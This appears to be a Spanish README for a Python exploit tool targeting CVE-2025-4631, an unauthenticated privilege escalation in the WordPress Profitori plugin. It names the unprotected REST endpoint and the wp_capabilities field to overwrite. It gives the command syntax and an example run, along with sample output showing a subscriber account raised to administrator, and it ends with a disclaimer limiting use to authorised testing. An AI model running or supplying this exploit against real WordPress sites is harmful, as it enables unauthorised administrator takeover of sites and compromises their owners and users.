
Profitori 2.0.6.0 - 2.1.1.3 - Falta de autorización que permite la escalada de privilegios sin autenticación
El Plugin Profitori (versiones 2.0.6.0 a 2.1.1.3) es vulnerable a una escalada de privilegios no autenticada debido a la falta de una comprobación de capacidades en el endpoint /wp-json/stocktend/v1/stocktend_object. Esto permite a atacantes remotos escalar los privilegios de usuarios existentes (o crear nuevos) manipulando directamente el campo meta wp_capabilities.
Este exploit en Python automatiza el proceso de escalada de privilegios:
readme.txt.Si la comprobación de la versión falla, el exploit continúa con precaución mostrando una advertencia.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requestsInstalar con:
pip install requests
Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. Cualquier uso indebido de este exploit contra sistemas que no poseas o para los que no tengas permiso explícito de prueba está estrictamente prohibido. El creador no es responsable de ningún daño o consecuencia legal derivados de un uso inadecuado.
POR: Nxploited ( Khaled_Alenazi )
| Flag | Descripción | Requerido |
|---|
-u, --url | 🌐 URL base del sitio WordPress | ✅ Sí |
-id | 🆔 ID del usuario a escalar | ✅ Sí |
--email | 📧 Correo falso a mostrar | ❌ No |
--name | 👤 Nombre a mostrar | ❌ No |
--url_field | 🔗 Campo URL del usuario | ❌ No |
--verbose | 🔍 Mostrar la respuesta JSON completa | ❌ No |